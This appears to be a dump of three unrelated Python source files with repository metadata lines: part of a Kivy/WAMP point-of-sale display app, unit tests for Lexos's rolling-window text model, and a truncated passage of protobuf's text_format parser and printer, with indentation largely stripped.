Create a WAMP session and start the WAMP component
"""
self.session = None
# adapt to fit the Crossbar.io instance you're using
url, realm = u"ws://"+server_url+"/ws", u"btmsserverauth"
store.put('settings', server_adress=server_url, ssl='0', user=user)
# Create our WAMP application component
runner = ApplicationRunner(url=url,
realm=realm,
extra=dict(ui=self))
# Start our WAMP application component without starting the reactor because
# that was already started by kivy
runner.run(BtmsPosDispWampComponentAuth, start_reactor=False)
@inlineCallbacks
def on_session(self, session):
"""
Called from WAMP session when attached to Crossbar router.
"""
self.session = session
self.ids.sm.current = 'work1'
self.camera_state = 0
results = yield self.session.call(u'io.crossbar.btms.users.get')
self.get_users(results)
self.ids.kv_user_button.text = btms_user
for row in results:
            if row['user'] == btms_user:  # TODO: simplify btms_user to user
self.user_id = row['id']
self.user = btms_user
#Register display on server
if self.ids.kv_pos_display_input.text == '':
self.ids.kv_pos_display_input.text = 'noname'
self.pos_display = self.ids.kv_pos_display_input.text
self.session.call(u'io.crossbar.btms.pos.displays.reg', self.pos_display,'')
#self.session.leave()
def onLeaveRemote(self,details):
ui.ids.kv_user_log.text = ui.ids.kv_user_log.text + '\n' + ("onLeaveRemote: {}".format(details))
print details
self.session.leave()
def get_users(self,results):
user_list1 = []
self.user_list = {}
self.ids.kv_user_list.clear_widgets(children=None)
for row in results:
print row['user']
self.user_list[row['id']] = row['user']
user_list1.append(row['user'])
self.ids.kv_user_list.add_widget(Button(text=str(row['user']), on_release=partial(self.change_user,str(row['user'])),size_hint=[1, None], height=dp(60)))
self.ids.kv_user_list.bind(minimum_height=self.ids.kv_user_list.setter('height'))
store.put('userlist', user_list=user_list1)
def change_user(self,user,*args):
self.ids.kv_password_input.text = ''
self.ids.kv_user_input.text = user
self.ids.sm.current = 'server_connect'
def logout(self,op):
self.logout_op = op
self.ids.kv_password_input.text = ''
self.ids.kv_user_change.disabled = False
self.session.leave()
#self.ids.sm.current = 'login_user'
def on_msg(self,display, msg):
print display, msg
if display == self.pos_display:
self.ids.result_screen_money.text = str(msg['total_price']) + unichr(8364)
self.ids.result_screen_info.text = msg['info']
def set_pos_display(self, *args):
self.session.call(u'io.crossbar.btms.pos.displays.reg', self.ids.kv_pos_display_input.text, self.pos_display)
self.pos_display = self.ids.kv_pos_display_input.text
store.put('displays',display=self.pos_display)
class BtmsPosDispApp(App):
def build(self):
self.title = 'BTMS Pos Display 16.04a'
self.root = BtmsPosDispRoot()
#self.root.ids.kv_user_change.disabled = True
if store.exists('settings'):
self.root.ids.kv_server_adress.text = store.get('settings')['server_adress']
self.root.ids.kv_user_input.text = store.get('settings')['user']
L = store.get('userlist')['user_list']
self.root.ids.kv_user_change.disabled = False
for user in L:
self.root.ids.kv_user_list.add_widget(Button(text=user, on_release=partial(self.root.change_user,user),size_hint=[1, None], height=dp(40)))
self.root.ids.kv_user_list.bind(minimum_height=self.root.ids.kv_user_list.setter('height'))
if store.exists('displays'):
self.root.ids.kv_pos_display_input.text = store.get('displays')['display']
#self.start_wamp_component()
return self.root
#def on_pause(self):
#self.root.stop() #Stop Camera
#return True
#def on_resume(self):
#self.root.stop() #Stop Camera
#TODO Pause and Resume not working if Camera is running
if __name__ == '__main__':
BtmsPosDispApp().run()
| jaques30081983/btms_suite | btms_pos_display/main.py | Python | gpl-2.0 | 9,128 |
import numpy as np
import pandas as pd
from lexos.models.rolling_window_model import RollingWindowsModel, \
RWATestOptions
from lexos.receivers.rolling_window_receiver import RWAFrontEndOptions, \
WindowUnitType, RWATokenType, RWARatioTokenOptions, RWAWindowOptions, \
RWAAverageTokenOptions, RWAPlotOptions
# -------------------------- test by ratio count ------------------------------
# noinspection PyProtectedMember
class TestRatioCountOne:
test_ratio_count = RWATestOptions(
file_id_content_map={0: "ha ha ha ha la ta ha",
1: "la la ta ta da da ha"},
rolling_windows_options=RWAFrontEndOptions(
ratio_token_options=RWARatioTokenOptions(
token_type=RWATokenType.string,
token_frame=pd.DataFrame(
data={
"numerator": ["t"],
"denominator": ["a"]
}
)
),
average_token_options=None,
passage_file_id=0,
window_options=RWAWindowOptions(
window_size=3,
window_unit=WindowUnitType.letter
),
plot_options=RWAPlotOptions(
individual_points=False,
black_white=False
),
milestone="ta",
text_color="#000000"
)
)
# Get the rolling window model and other test components
rw_ratio_model = RollingWindowsModel(test_option=test_ratio_count)
rw_ratio_windows = rw_ratio_model._get_windows()
rw_ratio_graph = rw_ratio_model._generate_rwa_graph()
rw_ratio_csv_frame = rw_ratio_model._get_rwa_csv_frame()
rw_ratio_milestone = \
rw_ratio_model._find_mile_stone_windows_indexes_in_all_windows()
def test_get_windows(self):
np.testing.assert_array_equal(
self.rw_ratio_windows,
['ha ', 'a h', ' ha', 'ha ', 'a h', ' ha', 'ha ', 'a h', ' ha',
'ha ', 'a l', ' la', 'la ', 'a t', ' ta', 'ta ', 'a h', ' ha'])
def test_token_ratio_windows(self):
pd.testing.assert_series_equal(
left=self.rw_ratio_model._find_token_ratio_in_windows(
numerator_token="t",
denominator_token="a",
windows=self.rw_ratio_windows
),
right=pd.Series(
data=[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.5, 0.5, 0.5, 0.0, 0.0],
),
check_names=False)
def test_generate_rwa_graph(self):
assert self.rw_ratio_graph['data'][0]['type'] == 'scattergl'
np.testing.assert_array_equal(
self.rw_ratio_graph['data'][0]['x'],
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17]
)
np.testing.assert_array_equal(
self.rw_ratio_graph['data'][0]['y'],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.5, 0.5, 0.5, 0.0, 0.0]
)
def test_find_milestone(self):
assert self.rw_ratio_milestone == {'t': [15],
'a': [1, 4, 7, 10, 13, 16]}
def test_csv_frame(self):
pd.testing.assert_frame_equal(
self.rw_ratio_csv_frame,
pd.DataFrame(
index=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17],
columns=["t / (t + a)"],
data=[[0.], [0.], [0.], [0.], [0.], [0.], [0.], [0.], [0.],
[0.], [0.], [0.], [0.], [0.5], [0.5], [0.5], [0.], [0.]]
)
)
# -----------------------------------------------------------------------------
# noinspection PyProtectedMember
class TestRatioCountTwo:
test_ratio_count = RWATestOptions(
file_id_content_map={0: "ha ha ha ha la ta ha \n ha ha \n ta ha",
1: "la la ta ta da da ha"},
rolling_windows_options=RWAFrontEndOptions(
ratio_token_options=RWARatioTokenOptions(
token_type=RWATokenType.word,
token_frame=pd.DataFrame(
data={
"numerator": ["ha"],
"denominator": ["la"]
}
)
),
average_token_options=None,
passage_file_id=0,
window_options=RWAWindowOptions(
window_size=2,
window_unit=WindowUnitType.word
),
plot_options=RWAPlotOptions(
individual_points=False,
black_white=False
),
milestone="ta",
text_color="#000000"
)
)
# Get the rolling window model and other testing components.
rw_ratio_model = RollingWindowsModel(test_option=test_ratio_count)
rw_ratio_windows = rw_ratio_model._get_windows()
rw_ratio_graph = rw_ratio_model._generate_rwa_graph()
rw_ratio_milestone = \
rw_ratio_model._find_mile_stone_windows_indexes_in_all_windows()
def test_get_windows(self):
np.testing.assert_array_equal(
self.rw_ratio_windows,
['ha ha ', 'ha ha ', 'ha ha ', 'ha la ', 'la ta ', 'ta ha \n ',
'ha \n ha ', 'ha ha \n ', 'ha \n ta ', 'ta ha'])
def test_generate_rwa_graph(self):
assert self.rw_ratio_graph['data'][0]['type'] == 'scattergl'
np.testing.assert_array_equal(
self.rw_ratio_graph['data'][0]['x'],
[0., 1., 2., 3., 4., 5., 6., 7., 8., 9.]
)
np.testing.assert_array_equal(
self.rw_ratio_graph['data'][0]['y'],
[1., 1., 1., 0.5, 0., 1., 1., 1., 1., 1.]
)
def test_find_milestone(self):
assert self.rw_ratio_milestone == {'t': [5, 9],
'a': []}
# -----------------------------------------------------------------------------
# -------------------------- test by average count ----------------------------
# noinspection PyProtectedMember
class TestAverageCountOne:
test_average_count = RWATestOptions(
file_id_content_map={
0: "ha ha \n ha ha \n la ta \n ha \n ta ta \n la la"},
rolling_windows_options=RWAFrontEndOptions(
ratio_token_options=None,
average_token_options=RWAAverageTokenOptions(
token_type=RWATokenType.string,
tokens=["ta", "ha"]),
passage_file_id=0,
window_options=RWAWindowOptions(
window_size=2,
window_unit=WindowUnitType.line
),
plot_options=RWAPlotOptions(
individual_points=False,
black_white=False
),
milestone=None,
text_color="#000000"
)
)
# Get the rolling window model and other testing components.
rw_average_model = RollingWindowsModel(test_option=test_average_count)
rw_average_windows = rw_average_model._get_windows()
rw_average_graph = rw_average_model._generate_rwa_graph()
rw_average_csv_frame = rw_average_model._get_rwa_csv_frame()
def test_get_windows(self):
np.testing.assert_array_equal(
self.rw_average_windows,
['ha ha \n ha ha \n', ' ha ha \n la ta \n', ' la ta \n ha \n',
' ha \n ta ta \n', ' ta ta \n la la']
)
def test_generate_rwa_graph(self):
assert self.rw_average_graph['data'][0]['type'] == 'scattergl'
np.testing.assert_array_equal(
self.rw_average_graph['data'][0]['x'],
[0., 1., 2., 3., 4.]
)
np.testing.assert_array_equal(
self.rw_average_graph['data'][0]['y'],
[0., 0.5, 0.5, 1., 1.]
)
assert self.rw_average_graph['data'][1]['mode'] == 'lines'
assert self.rw_average_graph['data'][1]['name'] == 'ha'
def test_csv_frame(self):
pd.testing.assert_frame_equal(
self.rw_average_csv_frame,
pd.DataFrame(
index=[0, 1, 2, 3, 4],
columns=["ta", "ha"],
data=[[0., 2.], [0.5, 1.], [0.5, 0.5], [1., 0.5], [1., 0.]]
)
)
# noinspection PyProtectedMember
class TestAverageCountTwo:
test_average_count = RWATestOptions(
file_id_content_map={
0: "ha ha \n ha ha \n la ta \n ha \n ta ta \n la la"},
rolling_windows_options=RWAFrontEndOptions(
ratio_token_options=None,
average_token_options=RWAAverageTokenOptions(
token_type=RWATokenType.word,
tokens=["ta", "ha"]),
passage_file_id=0,
window_options=RWAWindowOptions(
window_size=2,
window_unit=WindowUnitType.word
),
plot_options=RWAPlotOptions(
individual_points=False,
black_white=False
),
milestone=None,
text_color="#000000"
)
)
# Get the rolling window model and other testing components.
rw_average_model = RollingWindowsModel(test_option=test_average_count)
rw_average_windows = rw_average_model._get_windows()
rw_average_graph = rw_average_model._generate_rwa_graph()
rw_average_csv_frame = rw_average_model._get_rwa_csv_frame()
def test_get_windows(self):
np.testing.assert_array_equal(
self.rw_average_windows,
['ha ha \n ', 'ha \n ha ', 'ha ha \n ', 'ha \n la ', 'la ta \n ',
'ta \n ha \n ', 'ha \n ta ', 'ta ta \n ', 'ta \n la ', 'la la']
)
def test_generate_rwa_graph(self):
assert self.rw_average_graph['data'][0]['type'] == 'scattergl'
np.testing.assert_array_equal(
self.rw_average_graph['data'][0]['x'],
[0., 1., 2., 3., 4., 5., 6., 7., 8., 9.]
)
np.testing.assert_array_equal(
self.rw_average_graph['data'][0]['y'],
[0., 0., 0., 0., 0.5, 0.5, 0.5, 1., 0.5, 0.]
)
assert self.rw_average_graph['data'][1]['mode'] == 'lines'
assert self.rw_average_graph['data'][1]['name'] == 'ha'
def test_csv_frame(self):
pd.testing.assert_frame_equal(
self.rw_average_csv_frame,
pd.DataFrame(
index=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
columns=["ta", "ha"],
data=[[0.0, 1.0], [0.0, 1.0], [0.0, 1.0], [0.0, 0.5],
[0.5, 0.0], [0.5, 0.5], [0.5, 0.5], [1.0, 0.0],
[0.5, 0.0], [0.0, 0.0]]
)
)
# -----------------------------------------------------------------------------
# -------------------------- test static method -------------------------------
# noinspection PyProtectedMember
rw_test_letters = RollingWindowsModel._get_letters_windows(
passage="hello good", windows_size=2)
# noinspection PyProtectedMember
rw_test_words = RollingWindowsModel._get_word_windows(
passage="hello goodbye dog", window_size=1)
# noinspection PyProtectedMember
rw_test_lines = RollingWindowsModel._get_line_windows(
passage="hello goodbye dog hi \n this is a test \n this is another test",
window_size=1)
# noinspection PyProtectedMember
rw_test_find_regex = RollingWindowsModel._find_regex_in_window(
window="hello this the test", regex="^h")
# noinspection PyProtectedMember
rw_test_find_word = RollingWindowsModel._find_word_in_window(
window="hello this the test", word="the")
# noinspection PyProtectedMember
rw_test_find_string = RollingWindowsModel._find_string_in_window(
window="hello this the test the test", string="the test")
class TestStaticMethods:
def test_get_letters_window(self):
np.testing.assert_array_equal(
rw_test_letters[0:9],
['he', 'el', 'll', 'lo', 'o ', ' g', 'go', 'oo', 'od']
)
def test_get_words_window(self):
np.testing.assert_array_equal(rw_test_words[0:3],
['hello ', 'goodbye ', 'dog'])
def test_get_lines_window(self):
np.testing.assert_array_equal(rw_test_lines[0:3],
["hello goodbye dog hi \n",
" this is a test \n",
" this is another test"])
def test_find_regex(self):
assert rw_test_find_regex == 1
def test_find_word(self):
assert rw_test_find_word == 1
def test_find_string(self):
assert rw_test_find_string == 2
| WheatonCS/Lexos | test/unit_test/test_rolling_windows_model.py | Python | mit | 12,643 |
# Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains routines for printing protocol messages in text format.
Simple usage example:
# Create a proto object and serialize it to a text proto string.
message = my_proto_pb2.MyMessage(foo='bar')
text_proto = text_format.MessageToString(message)
# Parse a text proto string.
message = text_format.Parse(text_proto, my_proto_pb2.MyMessage())
"""
__author__ = '[email protected] (Kenton Varda)'
import io
import re
import six
if six.PY3:
long = int # pylint: disable=redefined-builtin,invalid-name
# pylint: disable=g-import-not-at-top
from google.protobuf.internal import type_checkers
from google.protobuf import descriptor
from google.protobuf import text_encoding
__all__ = ['MessageToString', 'PrintMessage', 'PrintField', 'PrintFieldValue',
'Merge']
_INTEGER_CHECKERS = (type_checkers.Uint32ValueChecker(),
type_checkers.Int32ValueChecker(),
type_checkers.Uint64ValueChecker(),
type_checkers.Int64ValueChecker())
_FLOAT_INFINITY = re.compile('-?inf(?:inity)?f?', re.IGNORECASE)
_FLOAT_NAN = re.compile('nanf?', re.IGNORECASE)
_FLOAT_TYPES = frozenset([descriptor.FieldDescriptor.CPPTYPE_FLOAT,
descriptor.FieldDescriptor.CPPTYPE_DOUBLE])
_QUOTES = frozenset(("'", '"'))
_ANY_FULL_TYPE_NAME = 'google.protobuf.Any'
class Error(Exception):
"""Top-level module error for text_format."""
class ParseError(Error):
"""Thrown in case of text parsing or tokenizing error."""
def __init__(self, message=None, line=None, column=None):
if message is not None and line is not None:
loc = str(line)
if column is not None:
loc += ':{0}'.format(column)
message = '{0} : {1}'.format(loc, message)
if message is not None:
super(ParseError, self).__init__(message)
else:
super(ParseError, self).__init__()
self._line = line
self._column = column
def GetLine(self):
return self._line
def GetColumn(self):
return self._column
class TextWriter(object):
def __init__(self, as_utf8):
if six.PY2:
self._writer = io.BytesIO()
else:
self._writer = io.StringIO()
def write(self, val):
if six.PY2:
if isinstance(val, six.text_type):
val = val.encode('utf-8')
return self._writer.write(val)
def close(self):
return self._writer.close()
def getvalue(self):
return self._writer.getvalue()
def MessageToString(message,
as_utf8=False,
as_one_line=False,
pointy_brackets=False,
use_index_order=False,
float_format=None,
use_field_number=False,
descriptor_pool=None,
indent=0,
message_formatter=None):
"""Convert protobuf message to text format.
Floating point values can be formatted compactly with 15 digits of
precision (which is the most that IEEE 754 "double" can guarantee)
using float_format='.15g'. To ensure that converting to text and back to a
proto will result in an identical value, float_format='.17g' should be used.
Args:
message: The protocol buffers message.
as_utf8: Produce text output in UTF8 format.
as_one_line: Don't introduce newlines between fields.
pointy_brackets: If True, use angle brackets instead of curly braces for
nesting.
use_index_order: If True, print fields of a proto message using the order
defined in source code instead of the field number. By default, use the
field number order.
float_format: If set, use this to specify floating point number formatting
(per the "Format Specification Mini-Language"); otherwise, str() is used.
use_field_number: If True, print field numbers instead of names.
descriptor_pool: A DescriptorPool used to resolve Any types.
indent: The indent level, in terms of spaces, for pretty print.
message_formatter: A function(message, indent, as_one_line): unicode|None
to custom format selected sub-messages (usually based on message type).
Use to pretty print parts of the protobuf for easier diffing.
Returns:
A string of the text formatted protocol buffer message.
"""
out = TextWriter(as_utf8)
printer = _Printer(out, indent, as_utf8, as_one_line, pointy_brackets,
use_index_order, float_format, use_field_number,
descriptor_pool, message_formatter)
printer.PrintMessage(message)
result = out.getvalue()
out.close()
if as_one_line:
return result.rstrip()
return result
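# Illustrative only (not part of the original module): a hedged sketch of the
# formatting options described in the docstring above, reusing the placeholder
# my_proto_pb2.MyMessage type from the module docstring.
#
#   msg = my_proto_pb2.MyMessage(foo='bar')
#   MessageToString(msg)                        # multi-line, one field per line
#   MessageToString(msg, as_one_line=True)      # single line, no trailing newline
#   MessageToString(msg, float_format='.17g')   # round-trippable float output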
def _IsMapEntry(field):
return (field.type == descriptor.FieldDescriptor.TYPE_MESSAGE and
field.message_type.has_options and
field.message_type.GetOptions().map_entry)
def PrintMessage(message,
out,
indent=0,
as_utf8=False,
as_one_line=False,
pointy_brackets=False,
use_index_order=False,
float_format=None,
use_field_number=False,
descriptor_pool=None,
message_formatter=None):
printer = _Printer(out, indent, as_utf8, as_one_line, pointy_brackets,
use_index_order, float_format, use_field_number,
descriptor_pool, message_formatter)
printer.PrintMessage(message)
def PrintField(field,
value,
out,
indent=0,
as_utf8=False,
as_one_line=False,
pointy_brackets=False,
use_index_order=False,
float_format=None,
message_formatter=None):
"""Print a single field name/value pair."""
printer = _Printer(out, indent, as_utf8, as_one_line, pointy_brackets,
use_index_order, float_format, message_formatter)
printer.PrintField(field, value)
def PrintFieldValue(field,
value,
out,
indent=0,
as_utf8=False,
as_one_line=False,
pointy_brackets=False,
use_index_order=False,
float_format=None,
message_formatter=None):
"""Print a single field value (not including name)."""
printer = _Printer(out, indent, as_utf8, as_one_line, pointy_brackets,
use_index_order, float_format, message_formatter)
printer.PrintFieldValue(field, value)
def _BuildMessageFromTypeName(type_name, descriptor_pool):
"""Returns a protobuf message instance.
Args:
type_name: Fully-qualified protobuf message type name string.
descriptor_pool: DescriptorPool instance.
Returns:
    A Message instance of type matching type_name, or None if a Descriptor
wasn't found matching type_name.
"""
# pylint: disable=g-import-not-at-top
if descriptor_pool is None:
from google.protobuf import descriptor_pool as pool_mod
descriptor_pool = pool_mod.Default()
from google.protobuf import symbol_database
database = symbol_database.Default()
try:
message_descriptor = descriptor_pool.FindMessageTypeByName(type_name)
except KeyError:
return None
message_type = database.GetPrototype(message_descriptor)
return message_type()
class _Printer(object):
"""Text format printer for protocol message."""
def __init__(self,
out,
indent=0,
as_utf8=False,
as_one_line=False,
pointy_brackets=False,
use_index_order=False,
float_format=None,
use_field_number=False,
descriptor_pool=None,
message_formatter=None):
"""Initialize the Printer.
Floating point values can be formatted compactly with 15 digits of
precision (which is the most that IEEE 754 "double" can guarantee)
using float_format='.15g'. To ensure that converting to text and back to a
proto will result in an identical value, float_format='.17g' should be used.
Args:
out: To record the text format result.
indent: The indent level for pretty print.
as_utf8: Produce text output in UTF8 format.
as_one_line: Don't introduce newlines between fields.
pointy_brackets: If True, use angle brackets instead of curly braces for
nesting.
use_index_order: If True, print fields of a proto message using the order
defined in source code instead of the field number. By default, use the
field number order.
float_format: If set, use this to specify floating point number formatting
(per the "Format Specification Mini-Language"); otherwise, str() is
used.
use_field_number: If True, print field numbers instead of names.
descriptor_pool: A DescriptorPool used to resolve Any types.
message_formatter: A function(message, indent, as_one_line): unicode|None
to custom format selected sub-messages (usually based on message type).
Use to pretty print parts of the protobuf for easier diffing.
"""
self.out = out
self.indent = indent
self.as_utf8 = as_utf8
self.as_one_line = as_one_line
self.pointy_brackets = pointy_brackets
self.use_index_order = use_index_order
self.float_format = float_format
self.use_field_number = use_field_number
self.descriptor_pool = descriptor_pool
self.message_formatter = message_formatter
def _TryPrintAsAnyMessage(self, message):
"""Serializes if message is a google.protobuf.Any field."""
packed_message = _BuildMessageFromTypeName(message.TypeName(),
self.descriptor_pool)
if packed_message:
packed_message.MergeFromString(message.value)
self.out.write('%s[%s]' % (self.indent * ' ', message.type_url))
self._PrintMessageFieldValue(packed_message)
self.out.write(' ' if self.as_one_line else '\n')
return True
else:
return False
def _TryCustomFormatMessage(self, message):
formatted = self.message_formatter(message, self.indent, self.as_one_line)
if formatted is None:
return False
out = self.out
out.write(' ' * self.indent)
out.write(formatted)
out.write(' ' if self.as_one_line else '\n')
return True
def PrintMessage(self, message):
"""Convert protobuf message to text format.
Args:
message: The protocol buffers message.
"""
if self.message_formatter and self._TryCustomFormatMessage(message):
return
if (message.DESCRIPTOR.full_name == _ANY_FULL_TYPE_NAME and
self._TryPrintAsAnyMessage(message)):
return
fields = message.ListFields()
if self.use_index_order:
fields.sort(key=lambda x: x[0].index)
for field, value in fields:
if _IsMapEntry(field):
for key in sorted(value):
          # This is slow for maps with submessage entries because it copies the
# entire tree. Unfortunately this would take significant refactoring
# of this file to work around.
#
# TODO(haberman): refactor and optimize if this becomes an issue.
entry_submsg = value.GetEntryClass()(key=key, value=value[key])
self.PrintField(field, entry_submsg)
elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
for element in value:
self.PrintField(field, element)
else:
self.PrintField(field, value)
def PrintField(self, field, value):
"""Print a single field name/value pair."""
out = self.out
out.write(' ' * self.indent)
if self.use_field_number:
out.write(str(field.number))
else:
if field.is_extension:
out.write('[')
if (field.containing_type.GetOptions().message_set_wire_format and
field.type == descriptor.FieldDescriptor.TYPE_MESSAGE and
field.label == descriptor.FieldDescriptor.LABEL_OPTIONAL):
out.write(field.message_type.full_name)
else:
out.write(field.full_name)
out.write(']')
elif field.type == descriptor.FieldDescriptor.TYPE_GROUP:
# For groups, use the capitalized name.
out.write(field.message_type.name)
else:
out.write(field.name)
if field.cpp_type != descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
# The colon is optional in this case, but our cross-language golden files
# don't include it.
out.write(': ')
self.PrintFieldValue(field, value)
if self.as_one_line:
out.write(' ')
else:
out.write('\n')
def _PrintMessageFieldValue(self, value):
if self.pointy_brackets:
openb = '<'
closeb = '>'
else:
openb = '{'
closeb = '}'
if self.as_one_line:
self.out.write(' %s ' % openb)
self.PrintMessage(value)
self.out.write(closeb)
else:
self.out.write(' %s\n' % openb)
self.indent += 2
self.PrintMessage(value)
self.indent -= 2
self.out.write(' ' * self.indent + closeb)
def PrintFieldValue(self, field, value):
"""Print a single field value (not including name).
For repeated fields, the value should be a single element.
Args:
field: The descriptor of the field to be printed.
value: The value of the field.
"""
out = self.out
if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
self._PrintMessageFieldValue(value)
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM:
enum_value = field.enum_type.values_by_number.get(value, None)
if enum_value is not None:
out.write(enum_value.name)
else:
out.write(str(value))
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING:
out.write('\"')
if isinstance(value, six.text_type):
out_value = value.encode('utf-8')
else:
out_value = value
if field.type == descriptor.FieldDescriptor.TYPE_BYTES:
# We need to escape non-UTF8 chars in TYPE_BYTES field.
out_as_utf8 = False
else:
out_as_utf8 = self.as_utf8
out.write(text_encoding.CEscape(out_value, out_as_utf8))
out.write('\"')
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL:
if value:
out.write('true')
else:
out.write('false')
elif field.cpp_type in _FLOAT_TYPES and self.float_format is not None:
out.write('{1:{0}}'.format(self.float_format, value))
else:
out.write(str(value))
def Parse(text,
message,
allow_unknown_extension=False,
allow_field_number=False,
descriptor_pool=None):
"""Parses a text representation of a protocol message into a message.
NOTE: for historical reasons this function does not clear the input
message. This is different from what the binary msg.ParseFrom(...) does.
Example
a = MyProto()
a.repeated_field.append('test')
b = MyProto()
text_format.Parse(repr(a), b)
text_format.Parse(repr(a), b) # repeated_field contains ["test", "test"]
# Binary version:
b.ParseFromString(a.SerializeToString()) # repeated_field is now "test"
Caller is responsible for clearing the message as needed.
Args:
text: Message text representation.
message: A protocol buffer message to merge into.
allow_unknown_extension: if True, skip over missing extensions and keep
parsing
allow_field_number: if True, both field number and field name are allowed.
descriptor_pool: A DescriptorPool used to resolve Any types.
Returns:
The same message passed as argument.
Raises:
ParseError: On text parsing problems.
"""
if not isinstance(text, str):
text = text.decode('utf-8')
return ParseLines(text.split('\n'),
message,
allow_unknown_extension,
allow_field_number,
descriptor_pool=descriptor_pool)
def Merge(text,
message,
allow_unknown_extension=False,
allow_field_number=False,
descriptor_pool=None):
"""Parses a text representation of a protocol message into a message.
Like Parse(), but allows repeated values for a non-repeated field, and uses
the last one.
Args:
text: Message text representation.
message: A protocol buffer message to merge into.
allow_unknown_extension: if True, skip over missing extensions and keep
parsing
allow_field_number: if True, both field number and field name are allowed.
descriptor_pool: A DescriptorPool used to resolve Any types.
Returns:
The same message passed as argument.
Raises:
ParseError: On text parsing problems.
"""
return MergeLines(
text.split('\n'),
message,
allow_unknown_extension,
allow_field_number,
descriptor_pool=descriptor_pool)
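# Illustrative only (not part of the original module): the practical difference
# between Parse() and Merge(), assuming MyMessage is a proto2 message with a
# singular (non-repeated) string field named foo.
#
#   text = 'foo: "first"\nfoo: "second"'
#   Merge(text, my_proto_pb2.MyMessage())   # allowed; keeps the last value, "second"
#   Parse(text, my_proto_pb2.MyMessage())   # raises ParseError: multiple "foo" fields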
def ParseLines(lines,
message,
allow_unknown_extension=False,
allow_field_number=False,
descriptor_pool=None):
"""Parses a text representation of a protocol message into a message.
Args:
lines: An iterable of lines of a message's text representation.
message: A protocol buffer message to merge into.
allow_unknown_extension: if True, skip over missing extensions and keep
parsing
allow_field_number: if True, both field number and field name are allowed.
descriptor_pool: A DescriptorPool used to resolve Any types.
Returns:
The same message passed as argument.
Raises:
ParseError: On text parsing problems.
"""
parser = _Parser(allow_unknown_extension,
allow_field_number,
descriptor_pool=descriptor_pool)
return parser.ParseLines(lines, message)
def MergeLines(lines,
message,
allow_unknown_extension=False,
allow_field_number=False,
descriptor_pool=None):
"""Parses a text representation of a protocol message into a message.
Args:
lines: An iterable of lines of a message's text representation.
message: A protocol buffer message to merge into.
allow_unknown_extension: if True, skip over missing extensions and keep
parsing
allow_field_number: if True, both field number and field name are allowed.
descriptor_pool: A DescriptorPool used to resolve Any types.
Returns:
The same message passed as argument.
Raises:
ParseError: On text parsing problems.
"""
parser = _Parser(allow_unknown_extension,
allow_field_number,
descriptor_pool=descriptor_pool)
return parser.MergeLines(lines, message)
class _Parser(object):
"""Text format parser for protocol message."""
def __init__(self,
allow_unknown_extension=False,
allow_field_number=False,
descriptor_pool=None):
self.allow_unknown_extension = allow_unknown_extension
self.allow_field_number = allow_field_number
self.descriptor_pool = descriptor_pool
def ParseFromString(self, text, message):
"""Parses a text representation of a protocol message into a message."""
if not isinstance(text, str):
text = text.decode('utf-8')
return self.ParseLines(text.split('\n'), message)
def ParseLines(self, lines, message):
"""Parses a text representation of a protocol message into a message."""
self._allow_multiple_scalars = False
self._ParseOrMerge(lines, message)
return message
def MergeFromString(self, text, message):
"""Merges a text representation of a protocol message into a message."""
    return self.MergeLines(text.split('\n'), message)
def MergeLines(self, lines, message):
"""Merges a text representation of a protocol message into a message."""
self._allow_multiple_scalars = True
self._ParseOrMerge(lines, message)
return message
def _ParseOrMerge(self, lines, message):
"""Converts a text representation of a protocol message into a message.
Args:
lines: Lines of a message's text representation.
message: A protocol buffer message to merge into.
Raises:
ParseError: On text parsing problems.
"""
tokenizer = Tokenizer(lines)
while not tokenizer.AtEnd():
self._MergeField(tokenizer, message)
def _MergeField(self, tokenizer, message):
"""Merges a single protocol message field into a message.
Args:
tokenizer: A tokenizer to parse the field name and values.
message: A protocol message to record the data.
Raises:
ParseError: In case of text parsing problems.
"""
message_descriptor = message.DESCRIPTOR
if tokenizer.TryConsume('['):
name = [tokenizer.ConsumeIdentifier()]
while tokenizer.TryConsume('.'):
name.append(tokenizer.ConsumeIdentifier())
name = '.'.join(name)
if not message_descriptor.is_extendable:
raise tokenizer.ParseErrorPreviousToken(
'Message type "%s" does not have extensions.' %
message_descriptor.full_name)
# pylint: disable=protected-access
field = message.Extensions._FindExtensionByName(name)
# pylint: enable=protected-access
if not field:
if self.allow_unknown_extension:
